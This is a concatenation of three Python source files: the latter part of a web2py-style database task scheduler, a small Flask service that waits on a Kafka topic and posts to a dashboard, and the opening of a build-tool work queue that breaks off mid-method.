return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now()
def set_requirements(self, scheduler_task):
from gluon import current
if hasattr(current, 'request'):
scheduler_task.application_name.default = '%s/%s' % (
current.request.application, current.request.controller
)
def define_tables(self, db, migrate):
from gluon.dal import DEFAULT
logger.debug('defining tables (migrate=%s)', migrate)
now = self.now
db.define_table(
'scheduler_task',
Field('application_name', requires=IS_NOT_EMPTY(),
default=None, writable=False),
Field('task_name', default=None),
Field('group_name', default='main'),
Field('status', requires=IS_IN_SET(TASK_STATUS),
default=QUEUED, writable=False),
Field('function_name',
requires=IS_IN_SET(sorted(self.tasks.keys()))
if self.tasks else DEFAULT),
Field('uuid', requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'),
unique=True, default=web2py_uuid),
Field('args', 'text', default='[]', requires=TYPE(list)),
Field('vars', 'text', default='{}', requires=TYPE(dict)),
Field('enabled', 'boolean', default=True),
Field('start_time', 'datetime', default=now,
requires=IS_DATETIME()),
Field('next_run_time', 'datetime', default=now),
Field('stop_time', 'datetime'),
Field('repeats', 'integer', default=1, comment="0=unlimited",
requires=IS_INT_IN_RANGE(0, None)),
Field('retry_failed', 'integer', default=0, comment="-1=unlimited",
requires=IS_INT_IN_RANGE(-1, None)),
Field('period', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(0, None)),
Field('timeout', 'integer', default=60, comment='seconds',
requires=IS_INT_IN_RANGE(0, None)),
Field('sync_output', 'integer', default=0,
comment="update output every n sec: 0=never",
requires=IS_INT_IN_RANGE(0, None)),
Field('times_run', 'integer', default=0, writable=False),
Field('times_failed', 'integer', default=0, writable=False),
Field('last_run_time', 'datetime', writable=False, readable=False),
Field('assigned_worker_name', default='', writable=False),
on_define=self.set_requirements,
migrate=migrate, format='%(task_name)s')
db.define_table(
'scheduler_run',
Field('scheduler_task', 'reference scheduler_task'),
Field('status', requires=IS_IN_SET(RUN_STATUS)),
Field('start_time', 'datetime'),
Field('stop_time', 'datetime'),
Field('output', 'text'),
Field('result', 'text'),
Field('traceback', 'text'),
Field('worker_name', default=self.worker_name),
migrate=migrate)
db.define_table(
'scheduler_worker',
Field('worker_name', unique=True),
Field('first_heartbeat', 'datetime'),
Field('last_heartbeat', 'datetime'),
Field('status', requires=IS_IN_SET(WORKER_STATUS)),
Field('is_ticker', 'boolean', default=False, writable=False),
Field('group_names', 'list:string', default=self.group_names),
migrate=migrate)
if migrate:
db.commit()
def loop(self, worker_name=None):
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
try:
self.start_heartbeats()
while True and self.have_heartbeat:
if self.worker_status[0] == DISABLED:
logger.debug('Someone stopped me, sleeping until better times come (%s)', self.worker_status[1])
self.sleep()
continue
logger.debug('looping...')
task = self.pop_task()
if task:
self.empty_runs = 0
self.worker_status[0] = RUNNING
self.report_task(task, self.async(task))
self.worker_status[0] = ACTIVE
else:
self.empty_runs += 1
logger.debug('sleeping...')
if self.max_empty_runs != 0:
logger.debug('empty runs %s/%s',
self.empty_runs, self.max_empty_runs)
if self.empty_runs >= self.max_empty_runs:
logger.info(
'empty runs limit reached, killing myself')
self.die()
self.sleep()
except (KeyboardInterrupt, SystemExit):
logger.info('catched')
self.die()
def wrapped_assign_tasks(self, db):
db.commit() # ?don't know if it's useful, let's be completely sure
x = 0
while x < 10:
try:
self.assign_tasks(db)
db.commit()
break
except:
db.rollback()
logger.error('TICKER(%s): error assigning tasks', self.worker_name)
x += 1
time.sleep(0.5)
def pop_task(self):
now = self.now()
db, st = self.db, self.db.scheduler_task
if self.is_a_ticker and self.do_assign_tasks:
#I'm a ticker, and 5 loops passed without reassigning tasks, let's do
#that and loop again
self.wrapped_assign_tasks(db)
return None
#ready to process something
grabbed = db(st.assigned_worker_name == self.worker_name)(
st.status == ASSIGNED)
task = grabbed.select(limitby=(0, 1), orderby=st.next_run_time).first()
if task:
task.update_record(status=RUNNING, last_run_time=now)
#noone will touch my task!
db.commit()
logger.debug(' work to do %s', task.id)
else:
if self.greedy and self.is_a_ticker:
#there are other tasks ready to be assigned
logger.info('TICKER (%s): greedy loop', self.worker_name)
self.wrapped_assign_tasks(db)
else:
logger.info('nothing to do')
return None
next_run_time = task.last_run_time + datetime.timedelta(
seconds=task.period)
times_run = task.times_run + 1
if times_run < task.repeats or task.repeats == 0:
#need to run (repeating task)
run_again = True
else:
#no need to run again
run_again = False
run_id = 0
while True and not self.discard_results:
logger.debug(' new scheduler_run record')
try:
run_id = db.scheduler_run.insert(
scheduler_task=task.id,
status=RUNNING,
start_time=now,
worker_name=self.worker_name)
db.commit()
break
except:
time.sleep(0.5)
db.rollback()
logger.info('new task %(id)s "%(task_name)s" %(application_name)s.%(function_name)s' % task)
return Task(
app=task.application_name,
function=task.function_name,
timeout=task.timeout,
args=task.args, # in json
vars=task.vars, # in json
task_id=task.id,
run_id=run_id,
run_again=run_again,
next_run_time=next_run_time,
times_run=times_run,
stop_time=task.stop_time,
retry_failed=task.retry_failed,
times_failed=task.times_failed,
sync_output=task.sync_output)
def report_task(self, task, task_report):
db = self.db
now = self.now()
while True:
try:
if not self.discard_results:
if task_report.result != 'null' or task_report.tb:
#result is 'null' as a string if task completed
#if it's stopped it's None as NoneType, so we record
#the STOPPED "run" anyway
logger.debug(' recording task report in db (%s)',
task_report.status)
db(db.scheduler_run.id == task.run_id).update(
status=task_report.status,
stop_time=now,
result=task_report.result,
output=task_report.output,
traceback=task_report.tb)
else:
logger.debug(' deleting task report in db because of no result')
db(db.scheduler_run.id == task.run_id).delete()
#if there is a stop_time and the following run would exceed it
is_expired = (task.stop_time
and task.next_run_time > task.stop_time
and True or False)
status = (task.run_again and is_expired and EXPIRED
or task.run_again and not is_expired
and QUEUED or COMPLETED)
if task_report.status == COMPLETED:
d = dict(status=status,
next_run_time=task.next_run_time,
times_run=task.times_run,
times_failed=0
)
db(db.scheduler_task.id == task.task_id)(
db.scheduler_task.status == RUNNING).update(**d)
else:
st_mapping = {'FAILED': 'FAILED',
'TIMEOUT': 'TIMEOUT',
'STOPPED': 'QUEUED'}[task_report.status]
status = (task.retry_failed
and task.times_failed < task.retry_failed
and QUEUED or task.retry_failed == -1
and QUEUED or st_mapping)
db(
(db.scheduler_task.id == task.task_id) &
(db.scheduler_task.status == RUNNING)
).update(
times_failed=db.scheduler_task.times_failed + 1,
next_run_time=task.next_run_time,
status=status
)
db.commit()
logger.info('task completed (%s)', task_report.status)
break
except:
db.rollback()
time.sleep(0.5)
def adj_hibernation(self):
if self.worker_status[0] == DISABLED:
wk_st = self.worker_status[1]
hibernation = wk_st + 1 if wk_st < MAXHIBERNATION else MAXHIBERNATION
self.worker_status[1] = hibernation
def send_heartbeat(self, counter):
if not self.db_thread:
logger.debug('thread building own DAL object')
self.db_thread = DAL(
self.db._uri, folder=self.db._adapter.folder)
self.define_tables(self.db_thread, migrate=False)
try:
db = self.db_thread
sw, st = db.scheduler_worker, db.scheduler_task
now = self.now()
# record heartbeat
mybackedstatus = db(
sw.worker_name == self.worker_name).select().first()
if not mybackedstatus:
sw.insert(status=ACTIVE, worker_name=self.worker_name,
first_heartbeat=now, last_heartbeat=now,
group_names=self.group_names)
self.worker_status = [ACTIVE, 1] # activating the process
else:
if mybackedstatus.status == DISABLED:
# keep sleeping
self.worker_status[0] = DISABLED
if self.worker_status[1] == MAXHIBERNATION:
logger.debug('........recording heartbeat')
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now)
elif mybackedstatus.status == TERMINATE:
self.worker_status[0] = TERMINATE
logger.debug("Waiting to terminate the current task")
self.give_up()
return
elif mybackedstatus.status == KILL:
self.worker_status[0] = KILL
self.die()
else:
logger.debug('........recording heartbeat (%s)', self.worker_status[0])
db(sw.worker_name == self.worker_name).update(
last_heartbeat=now, status=ACTIVE)
self.worker_status[1] = 1 # re-activating the process
if self.worker_status[0] <> RUNNING:
self.worker_status[0] = ACTIVE
self.do_assign_tasks = False
if counter % 5 == 0:
try:
# delete inactive workers
expiration = now - datetime.timedelta(seconds=self.heartbeat * 3)
departure = now - datetime.timedelta(
seconds=self.heartbeat * 3 * MAXHIBERNATION)
logger.debug(
' freeing workers that have not sent heartbeat')
inactive_workers = db(
((sw.last_heartbeat < expiration) & (sw.status == ACTIVE)) |
((sw.last_heartbeat <
departure) & (sw.status != ACTIVE))
)
db(st.assigned_worker_name.belongs(
inactive_workers._select(sw.worker_name)))(st.status == RUNNING)\
.update(assigned_worker_name='', status=QUEUED)
inactive_workers.delete()
self.is_a_ticker = self.being_a_ticker()
if self.worker_status[0] == ACTIVE:
self.do_assign_tasks = True
except:
pass
db.commit()
except:
db.rollback()
self.adj_hibernation()
self.sleep()
def being_a_ticker(self):
db = self.db_thread
sw = db.scheduler_worker
all_active = db(
(sw.worker_name != self.worker_name) & (sw.status == ACTIVE)
).select()
ticker = all_active.find(lambda row: row.is_ticker is True).first()
not_busy = self.worker_status[0] == ACTIVE
if not ticker:
if not_busy:
#only if this worker isn't busy, otherwise wait for a free one
db(sw.worker_name == self.worker_name).update(is_ticker=True)
db(sw.worker_name != self.worker_name).update(is_ticker=False)
logger.info("TICKER(%s): I'm a ticker", self.worker_name)
else:
#giving up, only if I'm not alone
if len(all_active) > 1:
db(sw.worker_name == self.worker_name).update(is_ticker=False)
else:
not_busy = True
db.commit()
return not_busy
else:
logger.info(
"%s is a ticker, I'm a poor worker" % ticker.worker_name)
return False
def assign_tasks(self, db):
sw, st = db.scheduler_worker, db.scheduler_task
now = self.now()
all_workers = db(sw.status == ACTIVE).select()
#build workers as dict of groups
wkgroups = {}
for w in all_workers:
group_names = w.group_names
for gname in group_names:
if gname not in wkgroups:
wkgroups[gname] = dict(
workers=[{'name': w.worker_name, 'c': 0}])
else:
wkgroups[gname]['workers'].append(
{'name': w.worker_name, 'c': 0})
#set queued tasks that expired between "runs" (i.e., you turned off
#the scheduler): then it wasn't expired, but now it is
db(st.status.belongs(
(QUEUED, ASSIGNED)))(st.stop_time < now).update(status=EXPIRED)
all_available = db(
(st.status.belongs((QUEUED, ASSIGNED))) &
((st.times_run < st.repeats) | (st.repeats == 0)) &
(st.start_time <= now) &
((st.stop_time == None) | (st.stop_time > now)) &
(st.next_run_time <= now) &
(st.enabled == True)
)
limit = len(all_workers) * (50 / (len(wkgroups) or 1))
#if there are a moltitude of tasks, let's figure out a maximum of tasks per worker.
#this can be adjusted with some added intelligence (like esteeming how many tasks will
#a worker complete before the ticker reassign them around, but the gain is quite small
#50 is quite a sweet spot also for fast tasks, with sane heartbeat values
#NB: ticker reassign tasks every 5 cycles, so if a worker completes his 50 tasks in less
#than heartbeat*5 seconds, it won't pick new tasks until heartbeat*5 seconds pass.
#If a worker is currently elaborating a long task, all other tasks assigned
#to him needs to be reassigned "freely" to other workers, that may be free.
#this shuffles up things a bit, in order to maintain the idea of a semi-linear scalability
#let's freeze it up
db.commit()
x = 0
for group in wkgroups.keys():
tasks = all_available(st.group_name == group).select(
limitby=(0, limit), orderby = st.next_run_time)
#let's break up the queue evenly among workers
for task in tasks:
x += 1
gname = task.group_name
ws = wkgroups.get(gname)
if ws:
counter = 0
myw = 0
for i, w in enumerate(ws['workers']):
if w['c'] < counter:
myw = i
counter = w['c']
d = dict(
status=ASSIGNED,
assigned_worker_name=wkgroups[gname]['workers'][myw]['name']
)
if not task.task_name:
d['task_name'] = task.function_name
task.update_record(**d)
wkgroups[gname]['workers'][myw]['c'] += 1
db.commit()
#I didn't report tasks but I'm working nonetheless!!!!
if x > 0:
self.empty_runs = 0
#I'll be greedy only if tasks assigned are equal to the limit
# (meaning there could be others ready to be assigned)
self.greedy = x >= limit and True or False
logger.info('TICKER(%s): workers are %s', self.worker_name, len(all_workers))
logger.info('TICKER(%s): tasks are %s', self.worker_name, x)
def sleep(self):
time.sleep(self.heartbeat * self.worker_status[1])
# should only sleep until next available task
def queue_task(self, function, pargs=[], pvars={}, **kwargs):
"""
Queue tasks. This takes care of handling the validation of all
values.
:param function: the function (anything callable with a __name__)
:param pargs: "raw" args to be passed to the function. Automatically
jsonified.
:param pvars: "raw" kwargs to be passed to the function. Automatically
jsonified
:param kwargs: all the scheduler_task columns. args and vars here should be
in json format already, they will override pargs and pvars
returns a dict just as a normal validate_and_insert, plus a uuid key holding
the uuid of the queued task. If validation is not passed, both id and uuid
will be None, and you'll get an "error" dict holding the errors found.
"""
if hasattr(function, '__name__'):
function = function.__name__
targs = 'args' in kwargs and kwargs.pop('args') or dumps(pargs)
tvars = 'vars' in kwargs and kwargs.pop('vars') or dumps(pvars)
tuuid = 'uuid' in kwargs and kwargs.pop('uuid') or web2py_uuid()
tname = 'task_name' in kwargs and kwargs.pop('task_name') or function
rtn = self.db.scheduler_task.validate_and_insert(
function_name=function,
task_name=tname,
args=targs,
vars=tvars,
uuid=tuuid,
**kwargs)
if not rtn.errors:
rtn.uuid = tuuid
else:
rtn.uuid = None
return rtn
def task_status(self, ref, output=False):
"""
Shortcut for task status retrieval
:param ref: can be
- integer --> lookup will be done by scheduler_task.id
- string --> lookup will be done by scheduler_task.uuid
- query --> lookup as you wish (as in db.scheduler_task.task_name == 'test1')
:param output: fetch also the scheduler_run record
Returns a single Row object, for the last queued task
If output == True, returns also the last scheduler_run record
scheduler_run record is fetched by a left join, so it can
have all fields == None
"""
from gluon.dal import Query
sr, st = self.db.scheduler_run, self.db.scheduler_task
if isinstance(ref, int):
q = st.id == ref
elif isinstance(ref, str):
q = st.uuid == ref
elif isinstance(ref, Query):
q = ref
else:
raise SyntaxError(
"You can retrieve results only by id, uuid or Query")
fields = st.ALL
left = False
orderby = ~st.id
if output:
fields = st.ALL, sr.ALL
left = sr.on(sr.scheduler_task == st.id)
orderby = ~st.id | ~sr.id
row = self.db(q).select(
*fields,
**dict(orderby=orderby,
left=left,
limitby=(0, 1))
).first()
if output:
row.result = row.scheduler_run.result and \
loads(row.scheduler_run.result,
object_hook=_decode_dict) or None
return row
def main():
"""
allows to run worker without python web2py.py .... by simply python this.py
"""
parser = optparse.OptionParser()
parser.add_option(
"-w", "--worker_name", dest="worker_name", default=None,
help="start a worker with name")
parser.add_option(
"-b", "--heartbeat", dest="heartbeat", default=10,
type='int', help="heartbeat time in seconds (default 10)")
parser.add_option(
"-L", "--logger_level", dest="logger_level",
default=30,
type='int',
help="set debug output level (0-100, 0 means all, 100 means none;default is 30)")
parser.add_option("-E", "--empty-runs",
dest="max_empty_runs",
type='int',
default=0,
help="max loops with no grabbed tasks permitted (0 for never check)")
parser.add_option(
"-g", "--group_names", dest="group_names",
default='main',
help="comma separated list of groups to be picked by the worker")
parser.add_option(
"-f", "--db_folder", dest="db_folder",
default='/Users/mdipierro/web2py/applications/scheduler/databases',
help="location of the dal database folder")
parser.add_option(
"-u", "--db_uri", dest="db_uri",
default='sqlite://storage.sqlite',
help="database URI string (web2py DAL syntax)")
parser.add_option(
"-t", "--tasks", dest="tasks", default=None,
help="file containing task files, must define" +
"tasks = {'task_name':(lambda: 'output')} or similar set of tasks")
parser.add_option(
"-U", "--utc-time", dest="utc_time", default=False,
help="work with UTC timestamps"
)
(options, args) = parser.parse_args()
if not options.tasks or not options.db_uri:
print USAGE
if options.tasks:
path, filename = os.path.split(options.tasks)
if filename.endswith('.py'):
filename = filename[:-3]
sys.path.append(path)
print 'importing tasks...'
tasks = __import__(filename, globals(), locals(), [], -1).tasks
print 'tasks found: ' + ', '.join(tasks.keys())
else:
tasks = {}
group_names = [x.strip() for x in options.group_names.split(',')]
logging.getLogger().setLevel(options.logger_level)
print 'groups for this worker: ' + ', '.join(group_names)
print 'connecting to database in folder: ' + options.db_folder or './'
print 'using URI: ' + options.db_uri
db = DAL(options.db_uri, folder=options.db_folder)
print 'instantiating scheduler...'
scheduler = Scheduler(db=db,
worker_name=options.worker_name,
tasks=tasks,
migrate=True,
group_names=group_names,
heartbeat=options.heartbeat,
max_empty_runs=options.max_empty_runs,
utc_time=options.utc_time)
signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1))
print 'starting main worker loop...'
scheduler.loop()
if __name__ == '__main__':
main()
|
kafka_consumer.py | import requests
import argparse
import logging
import coloredlogs
import threading
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
import json
from kafka import KafkaConsumer
from threading import Thread
import time
app = Flask(__name__)
logger = logging.getLogger("KafkaConsumer")
@app.route('/', methods=['GET'])
def server_status():
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "KafkaConsumer REST API"
return jsonify(swag)
def kafka_consumer_refresh_dashboard_handler(topic, value):
logger.info("Creating Kafka Consumer for %s topic", topic)
consumer = KafkaConsumer(
topic,
bootstrap_servers=[kafka_ip_port],
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id=None,
value_deserializer=lambda x: json.loads(x.decode('utf-8')))
message_received = False
while not message_received:
message = consumer.poll(timeout_ms=1000)
if message != {}:
logger.info("Message received in %s topic: %s", topic, message)
message_received = True
time.sleep(5)
logger.info("Creating dashboard for topic: %s", topic)
r = requests.post(url_dcs_dashboard, json=json.loads(json.dumps({'records': [ { 'value': value }]})))
logger.info("Response: Code %s", r)
# This call seems that is not needed as the dashboard is generated when data is present.
#time.sleep(2)
#logger.info("Refreshing dashboard for %s topic", topic)
#subprocess.call(['/bin/bash', '/usr/bin/dcs/refresh_dashboard.sh', topic])
logger.info("Closing Kafka Consumer for %s topic", topic)
consumer.close()
@app.route('/kafka_consumer', methods=['POST'])
def kafka_consumer():
logger.info("Request received - POST /kafka_consumer")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
data = request.get_json()
value = data["value"]
topic = value["topic"]
# Create Kafka consumer to wait for the first message received in the topic and, then, refresh the dashboard.
thread = threading.Thread(target = kafka_consumer_refresh_dashboard_handler, args = [topic, value])
thread.start()
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
if __name__ == "__main__":
# Usage: /usr/bin/python3 kafka_consumer.py --dcs_dashboard_ip_port localhost:8080 --kafka_ip_port localhost:9092 --log info
parser = argparse.ArgumentParser()
parser.add_argument(
"--dcs_dashboard_ip_port",
help='DCS Dashboard IP:port',
default='localhost:8080')
parser.add_argument(
"--kafka_ip_port",
help='Kafka IP:port',
default='localhost:9092')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % loglevel)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("KafkaConsumer").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global dcs_dashboard_ip_port
dcs_dashboard_ip_port = str(args.dcs_dashboard_ip_port)
global url_dcs_dashboard
url_dcs_dashboard = "http://" + dcs_dashboard_ip_port + "/portal/dcs/dashboard"
global kafka_ip_port
kafka_ip_port= str(args.kafka_ip_port)
logger.info("Serving KafkaConsumer on port 8291")
serve(app, host='0.0.0.0', port=8291)
|
work_queue.py | # -*- python -*-
# Mark Charney
#BEGIN_LEGAL
#
#Copyright (c) 2017x Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
"""Command objects and parallel work queue"""
from __future__ import print_function
import os
import sys
import types
is_py2 = sys.version[0] == '2'
if is_py2:
import Queue as queue
else:
import queue as queue
from threading import Thread
from collections import deque
from .base import *
from .util import *
from .dag import *
############################################################################
class dir_cmd_t(object):
"""For holding a directory and a command. When you call
execute(), it changes to the directory an executes the command"""
def __init__(self, dir, command, output_file=None):
self.dir= dir
self.command= command
self.output_file = output_file
def __str__(self):
return "DIR: %s\nCOMMAND: %s" % (self.dir, self.command)
def execute(self,args=None, env=None):
"""Change to the specified directory and execute the command,
unbufferred"""
orig = os.getcwd()
try:
msgb("CHDIR TO", self.dir)
os.chdir(self.dir)
except:
return (-1, ["no such dir: " + self.dir])
msgb("EXECUTING", self.command)
if self.output_file:
(retcode, out, err) = \
run_command_output_file(self.command, self.output_file)
msgb("WROTE", self.output_file)
else:
(retcode, out, err) = run_command_unbufferred(self.command)
os.chdir(orig)
if not err:
err = []
if not out:
out = []
if err:
return (retcode, out+err)
else:
return (retcode, out)
class command_t(object):
"""The primary data structure used to track jobs in this script. It
is created when you add L{plan_t} objects to the DAG
L{dag_t}."""
_ids = 0
def __init__(self,
command=None,
args=None,
xenv=None,
unbufferred=False,
output_file_name=None,
shell_executable=None,
directory=None,
name=None,
show_output=True,
osenv=None,
seconds=0,
input_file_name=None):
"""
This is the unit of work for the L{work_queue_t}. These are
typically created by the L{dag_t} but they can also be created
by hand and added to the L{work_queue_t} to execute arbitrary
commands.
@type command: string or python function, or a list of both
@param command: command line string to execute or a python function
@type args: anything
@param args: (optional) typically a list of arguments for the python function.
@type xenv: L{env_t}
@param xenv: (optional) environment for used by the python
function. Passed as the second argument to the python function.
@type osenv: dictionary
@param osenv: (optional) the environment that will be set in the new subprocess.
@type unbufferred: L{bool}
@param unbufferred: (optional) true if the output should be unbufferred.
@type output_file_name: string
@param output_file_name: (optional) file name for stderr/stdout
@type show_output: L{bool}
@param show_output: (optional) show output, default True
@type input_file_name: string
@param input_file_name: (optional) file name for stdin
"""
self.id = command_t._ids
command_t._ids += 1
# store the command as a list
if isinstance(command,list):
self.command = command
else:
self.command = [ command ]
self.name = name
self.shell_executable = shell_executable
self.args = args
self.xenv = xenv
self.osenv = osenv
self.exit_status = 0
self.output = []
self.stderr = []
self.unbufferred = unbufferred
self.input_file_name = input_file_name
self.output_file_name = output_file_name
self.start_time = 0
self.end_time = 0
self.directory = directory
self.show_output = show_output
self.input_file_name = input_file_name
# Has this command be submitted to the work queue?
self.submitted = False
# executed is set to True when this command tries to execute.
self.executed = False
# all prerequisite commands are ready
self.ready = False
# completed is set to True when this command exits successfully.
self.completed = False
# things that depend on this command completing sucessfully
self.after_me = []
# things that must complete before this command can run
self.before_me = []
# from the file DAG. A list of inputs upon which this command depends
self.inputs = []
# from the file DAG. A list of things generated by this command
self.targets = []
# used for special signals to the worker threads to tell them to
# shut down.
self.terminator = False
self.timeout = seconds
def failed(self):
"""
Return the exit status.
@rtype: bool
@return: True if the command failed (exit status != 0)
"""
if self.exit_status != 0:
return True
return False
def _complete(self):
self.completed = True
def _ready(self):
"""Return true if all things that must execute before this node
have completed and false otherwise. Updates self.ready."""
if self.ready:
return True
for n in self.before_me:
if not n.completed:
return False
self.ready=True
return True
def is_python_command(self, i=0):
"""Return true if the command list element is a python function
@rtype: bool
"""
if isinstance(self.command[i],types.FunctionType):
return True
return False
def is_dir_cmd(self, i=0):
"""Return true if the command list element is a python dir_cmd_t object
@rtype: bool
"""
if isinstance(self.command[i],dir_cmd_t):
return True
return False
def has_python_subcommand(self):
"""Return true if the command list has a python function
@rtype: bool
"""
for c in self.command:
if isinstance(c,types.FunctionType):
return True
return False
def is_command_line(self, i=0):
"""Return true if the command list element is normal string command
line.
@rtype: bool
"""
if not isinstance(self.command[i],types.FunctionType) and \
not isinstance(self.command[i],dir_cmd_t):
return True
return False
def dagkey(self):
s = []
for i in self.command:
if not isinstance(i,types.FunctionType):
s.append(i)
t = "MBUILD_COMMAND_KEY " + (" - ".join(s))
return t
def hash(self):
s = []
for i in self.command:
if not isinstance(i,types.FunctionType):
s.append(i)
t = " - ".join(s)
h = hash_string(t.encode('utf-8'))
return h
def add_before_me(self,n):
"""Make the current command execute after command n
@type n: L{command_t}
@param n: another (earlier) command
"""
if isinstance(n,list):
for x in n:
self.before_me.append(x)
x.after_me.append(self)
else:
self.before_me.append(n)
n.after_me.append(self)
def add_after_me(self,n):
"""Make the current command execute before command n.
@type n: L{command_t}
@param n: another (later) command
"""
if isinstance(n, list):
for x in n:
self.after_me.append(x)
x.before_me.append(self)
else:
self.after_me.append(n)
n.before_me.append(self)
def _check_afters(self):
"""Return a list of after nodes that are as-yet not submitted
but now ready"""
ready = []
for x in self.after_me:
if not x.submitted and x._ready():
ready.append(x)
return ready
def elapsed_time(self):
"""Return the elapsed time as an number of seconds"""
if self.end_time == None:
self.end_time = get_time()
return self.end_time - self.start_time
def elapsed(self):
"""Return the elapsed time.
@rtype: string
@returns: the elapsed wall clock time of execution.
"""
if self.end_time == None:
self.end_time = get_time()
elapsed = get_elapsed_time(self.start_time, self.end_time)
return elapsed
def dump_cmd(self):
return self._pretty_cmd_str()
def stderr_exists(self):
if self.stderr and len(self.stderr) > 0:
if len(self.stderr) == 1 and len(self.stderr[0]) == 0:
return False
return True
return False
def stdout_exists(self):
if self.output and len(self.output) > 0:
if len(self.output) == 1 and len(self.output[0]) == 0:
return False
return True
return False
def _pretty_cmd_str(self):
s = []
for cmd in self.command:
if isinstance(cmd,types.FunctionType):
s.append("PYTHON FN: " + cmd.__name__)
elif is_stringish(cmd):
s.append(cmd)
else:
s.append(str(cmd))
return " ;;;; ".join(s)
def dump(self, tab_output=False, show_output=True):
s = []
nl = '\n'
if verbose(1):
pass
elif self.failed():
pass
elif self.targets:
s.append(bracket('TARGET ', " ".join(self.targets)))
s.append(nl)
if self.name:
s.append(bracket('NAME ', self.name))
s.append(nl)
if self.command:
s.append(bracket('COMMAND ', self._pretty_cmd_str()))
s.append(nl)
else:
s.append( bracket('COMMAND ', 'none') )
s.append(nl)
if self.args:
args_string = str(self.args)
print_limit = 400
if len(args_string) > print_limit:
args_string = args_string[:print_limit]
s.append(bracket('ARGS ', args_string))
s.append(nl)
if self.xenv:
s.append(bracket('ENV ', 'some env'))
s.append(nl)
#if self.submitted:
# s.append(bracket('START_TIME ', self.start_time))
# s.append(nl)
if self.input_file_name:
s.append(bracket('INPUT_FILE ', self.input_file_name))
s.append(nl)
if self.completed or self.failed():
if self.exit_status != 0:
s.append(bracket('EXIT_STATUS ', str(self.exit_status)))
s.append(nl)
if self.elapsed_time() > 1:
s.append(bracket('ELAPSED_TIME', self.elapsed()))
s.append(nl)
if self.input_file_name:
s.append(bracket('INPUT FILE', self.input_file_name))
s.append(nl)
if self.output_file_name:
s.append(bracket('OUTPUT FILE', self.output_file_name))
s.append(nl)
# stdout and stderr frequently have unicode
s = ensure_string(s)
if self.unbufferred == False and self.output_file_name==None:
if show_output and self.show_output and self.stdout_exists():
uappend(s,bracket('OUTPUT'))
uappend(s,nl)
for line in self.output:
if tab_output:
uappend(s,'\t')
uappend(s,line)
if show_output and self.show_output and self.stderr_exists():
uappend(s,bracket('STDERR'))
uappend(s,nl)
for line in self.stderr:
if tab_output:
uappend(s,'\t')
uappend(s,line)
return u"".join(s)
def __str__(self):
return self.dump()
def _extend_output(self, lines):
if lines:
util_add_to_list(self.output,ensure_string(lines))
def _extend_stderr(self, lines):
if lines:
util_add_to_list(self.stderr,ensure_string(lines))
def _extend_output_stderr(self, output, stderr):
self._extend_output(output)
self._extend_stderr(stderr)
def execute(self):
"""Execute the command whether it be a python function or a
command string. This is executed by worker threads but is made
available here for potential debugging. Record execution exit/return
status and output.
Sets the exit_status, output and stderr error fields of the
command object.
"""
self.executed = True
self.start_time = get_time()
self.output = []
self.stderr = []
for cmd in self.command:
try:
if isinstance(cmd, dir_cmd_t):
# execute dir_cmd_t objects
(self.exit_status, output) = cmd.execute( self.args, self.xenv )
self._extend_output(output)
elif isinstance(cmd,types.FunctionType):
# execute python functions
(self.exit_status, output) = cmd( self.args, self.xenv )
self._extend_output(output)
elif is_stringish(cmd):
# execute command strings
if self.output_file_name:
(self.exit_status, output, stderr) = \
run_command_output_file(cmd,
self.output_file_name,
shell_executable=self.shell_executable,
directory=self.directory,
osenv=self.osenv,
input_file_name=self.input_file_name)
self._extend_output_stderr(output,stderr)
elif self.unbufferred:
(self.exit_status, output, stderr) = \
run_command_unbufferred(cmd,
shell_executable=
self.shell_executable,
directory = self.directory,
osenv = self.osenv,
input_file_name=self.input_file_name)
self._extend_output_stderr(output, stderr)
else:
# execute timed_cmd_t objects
(self.exit_status, output, stderr) = \
run_command_timed(cmd,
shell_executable=self.shell_executable,
directory = self.directory,
osenv = self.osenv,
seconds=self.timeout,
input_file_name = self.input_file_name)
self._extend_output_stderr(output, stderr)
else:
self.exit_status = 1
self._extend_output("Unhandled command object: " + self.dump())
# stop if something failed
if self.exit_status != 0:
break;
except Exception as e:
self.exit_status = 1
self._extend_stderr(u"Execution error for: %s\n%s" % (ustr(e), self.dump()))
break
self.end_time = get_time()
def _worker_one_task(incoming,outgoing):
"""A thread. Takes stuff from the incoming queue and puts stuff on
the outgoing queue. calls execute for each command it takes off the
in queue. Return False when we receive a terminator command"""
#msgb("WORKER WAITING")
item = incoming.get()
#msgb("WORKER GOT A TASK")
if item.terminator:
outgoing.put(item)
return False
item.execute()
incoming.task_done()
outgoing.put(item)
return True
def _worker(incoming,outgoing):
"""A thread. Takes stuff from the incoming queue and puts stuff on
the outgoing queue. calls execute for each command it takes off the
in queue. Return when we get a terminator command"""
keep_going = True
while keep_going:
keep_going = _worker_one_task(incoming, outgoing)
class work_queue_t(object):
"""This stores the threads and controls their execution"""
def __init__(self, max_parallelism=4):
"""
@type max_parallelism: int
@param max_parallelism: the number of worker threads to start
"""
max_parallelism = int(max_parallelism)
if max_parallelism <= 0:
